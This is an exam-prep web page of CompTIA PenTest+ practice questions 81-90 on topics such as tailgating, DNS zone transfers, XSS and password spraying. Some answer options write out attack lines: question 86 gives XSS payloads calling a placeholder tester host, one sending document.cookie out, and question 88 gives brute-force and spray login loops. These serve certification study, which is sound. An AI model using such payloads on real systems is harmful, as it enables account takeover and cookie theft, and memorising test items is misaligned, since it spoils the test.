Pre-Summer Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: force70

Pass the CompTIA PenTest+ PT0-003 Questions and answers with CertsForce

Viewing page 9 out of 10 pages
Viewing questions 81-90 out of questions
Questions # 81:

Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?

Options:

A.

Badge cloning


B.

Shoulder surfing


C.

Tailgating


D.

Site survey


Expert Solution
Questions # 82:

A penetration tester compromises a Windows OS endpoint that is joined to an Active Directory local environment. Which of the following tools should the tester use to manipulate authentication mechanisms to move laterally in the network?

Options:

A.

Rubeus


B.

WinPEAS


C.

NTLMRelayX


D.

Impacket


Expert Solution
Questions # 83:

During an engagement, a penetration tester runs the following command against the host system:

host -t axfr domain.com dnsl.domain.com

Which of the following techniques best describes what the tester is doing?

Options:

A.

Zone transfer


B.

Host enumeration


C.

DNS poisoning


D.

DNS query


Expert Solution
Questions # 84:

During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt, presenting a text box when browsing to the page going forward. Which of the following types of attacks is this an example of?

Options:

A.

SQL injection


B.

SSRF


C.

XSS


D.

Server-side template injection


Expert Solution
Questions # 85:

A penetration tester finishes an initial discovery scan for hosts on a /24 customer subnet. The customer states that the production network is composed of Windows servers but no container clusters. The following are the last several lines from the scan log:

Line 1: 112 hosts found... trying ports

Line 2: FOUND 22 with OpenSSH 1.2p2 open on 99 hosts

Line 3: FOUND 161 with UNKNOWN banner open on 110 hosts

Line 4: TCP RST received on ports 21, 3389, 80

Line 5: Scan complete.

Which of the following is the most likely reason for the results?

Options:

A.

Multiple honeypots were encountered


B.

The wrong subnet was scanned


C.

Windows is using WSL


D.

IPS is blocking the ports


Expert Solution
Questions # 86:

During a penetration test, a tester has confirmed stored XSS within a comment form on a site. Which of the following payloads is required to exploit the vulnerability and provide a reverse shell against user browsers?

Options:

A.

Use Evilginx and insert payload < img src= " http:// < tester-IP > /?f ' document.cookie+ ' "


B.

Use BeEF and insert payload < script src= " http:// < tester-IP > :3000/hook.js " >


C.

Use Netcat listener and insert payload < iframe src=http:// < tester-IP > /../../bin/bash >


D.

Use Metasploit post/firefox/gather/xss and insert payload < img src= " http:// < tester-IP > "


Expert Solution
Questions # 87:

A penetration tester plans to conduct reconnaissance during an engagement using readily available resources. Which of the following resources would most likely identify hardware and software being utilized by the client?

Options:

A.

Cryptographic flaws


B.

Protocol scanning


C.

Cached pages


D.

Job boards


Expert Solution
Questions # 88:

A penetration tester is evaluating the security of a corporate client’s web application using federated access. Which of the following approaches has the least possibility of blocking the IP address of the tester’s machine?

Options:

A.

for user in $(cat users.txt); dofor pass in $(cat /usr/share/wordlists/rockyou.txt); docurl -sq -XPOST https://example.com/login.asp -d " username=$user & password=$pass " | grep " Welcome " & & echo " OK: $user $pass " done; done


B.

spray365.py generate --password_file passwords.txt --user_file users.txt --domain example.com --delay 1 --execution_plan target.planspray365.py spray target.plan


C.

import requests,pathlibusers=pathlib.Path( " users.txt " ).read_text(); passwords=pathlib.Path( " passwords.txt " ).read_text()for user in user:for pass in passwords:r=requests.post( " https://example.com " ,data=f " username={user} & password={pass} " ,headers={ " user-agent " : " Mozilla/5.0 " })if " Welcome " in r.text:print(f " OK: {user} {pass} " )


D.

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt < domain_ip > http-post-form " /login.asp:username=^USER^ & password=^PASS^:Invalid Password "


Expert Solution
Questions # 89:

During a security assessment, a penetration tester wants to compromise user accounts without triggering IDS/IPS detection rules. Which of the following is the most effective way for the tester to accomplish this task?

Options:

A.

Crack user accounts using compromised hashes.


B.

Brute force accounts using a dictionary attack.


C.

Bypass authentication using SQL injection.


D.

Compromise user accounts using an XSS attack.


Expert Solution
Questions # 90:

A penetration tester is getting ready to conduct a vulnerability scan to evaluate an environment that consists of a container orchestration cluster. Which of the following tools would be best to use for this purpose?

Options:

A.

NSE


B.

Nessus


C.

CME


D.

Trivy


Expert Solution
Viewing page 9 out of 10 pages
Viewing questions 81-90 out of questions